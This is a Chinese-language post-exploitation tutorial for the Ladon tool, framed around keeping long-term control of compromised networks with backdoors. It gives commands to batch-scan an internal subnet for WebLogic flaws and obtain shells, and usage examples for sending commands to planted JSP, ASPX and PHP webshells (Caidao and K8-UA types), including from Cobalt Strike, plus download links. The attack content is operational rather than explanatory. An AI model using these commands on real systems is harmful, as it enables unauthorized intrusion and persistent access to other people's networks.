前言

无论是外网渗透还是内网渗透，为了能够长期控制权限，都会留下各类后门。
WebShell无额外进程、无额外端口、不主动向外连接的后门使用频率非常高。
外网的有很多管理工具不用说了，但是内网有WebShell机器无法上网怎么办？
方案1：代理后管理工具访问，缺点代理卡时，无法连接内网WebShell
方案2：使用Ladon，无需代理，只要有SHELL就可以连接内网WebShell

PS: Shell不只限于WebShell，而是任何可执行命令的，含远控、后门

一键GetShell

使用WebLogicExp模块对内网进行Weblogic漏洞扫描并GetShell

批量：Ladon 192.168.1.8/24 WeblogicExp

Ladon JspShell

Usage：Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon JspShell cd http://192.168.1.8/shell.jsp Ladon whoami

K8-UA马,类型为1或ua（例子WebLogic）

菜刀马,类型为2或cd（例子Struts2）

CS JspShell

Cobalt Strike下Ladon连接内网WebShell，用法和在CMD下一模一样

其它webshell

Usage：Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

下载

CS: https://github.com/k8gege/Aggressor
Ladon: https://github.com/k8gege/Ladon